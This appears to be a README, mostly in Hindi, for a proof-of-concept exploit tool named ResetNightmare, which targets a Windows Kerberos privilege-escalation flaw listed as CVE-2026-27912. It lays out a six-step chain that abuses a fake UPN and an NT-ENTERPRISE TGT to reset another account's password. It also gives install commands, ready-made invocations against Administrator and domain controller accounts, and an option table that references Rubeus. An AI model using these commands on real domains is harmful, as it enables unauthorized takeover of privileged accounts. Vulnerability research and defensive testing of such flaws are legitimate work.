
CVE-2026-27912 के लिए PoC - Windows Kerberos विशेषाधिकार उन्नयन (ResetNightmare)। Kerberos दोष के माध्यम से अनधिकृत पासवर्ड रीसेट। केवल सुरक्षा अनुसंधान के लिए।
CVE-2026-27912 - विंडोज़ केर्बेरोस विशेषाधिकार उन्नयन भेद्यता
ResetNightmare - केर्बेरोस चेंज पासवर्ड प्रोटोकॉल की खामी के माध्यम से अनधिकृत पासवर्ड रीसेट
| फ़ील्ड | मान |
|---|---|
| CVE | CVE-2026-27912 |
| शीर्षक | विंडोज़ केर्बेरोस विशेषाधिकार उन्नयन भेद्यता |
| CVSS | 8.0 उच्च (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE-285: अनुचित प्राधिकरण |
| प्रकाशित | 14 अप्रैल, 2026 |
| पैच किया गया | अप्रैल 2026 |
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success
Install-WindowsFeature RSAT-AD-PowerShell)# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912
# Install dependencies
pip install -r requirements.txt
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v
केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक अनुसंधान के लिए।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस सॉफ़्टवेयर के दुरुपयोग के लिए कोई दायित्व नहीं लेता है।
n0vax1337 / सुरक्षा शोधकर्ता
MIT लाइसेंस - देखें LICENSE
अंतिम अद्यतन: 2026
| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|
-t / --target | लक्ष्य खाते का नाम | आवश्यक |
-p / --new-password | लक्ष्य के लिए नया पासवर्ड | आवश्यक |
-u / --upn-user | वह खाता जिस पर फर्जी UPN सेट करना है | आवश्यक |
-up / --upn-password | UPN खाते का पासवर्ड | आवश्यक |
-c / --computer | UPNUser एक कंप्यूटर खाता है | फ़्लैग |
-r / --rubeus-path | Rubeus.exe का पथ | Rubeus.exe |
-e / --encryption | समर्थित एन्क्रिप्शन प्रकार | AES256 |
-path / --create-path | नया खाता बनाने के लिए OU पथ | "" |
-d / --dc | डोमेन कंट्रोलर का नाम | स्वतः पता लगाएँ |
-v / --verbose | वर्बोज़ आउटपुट | फ़्लैग |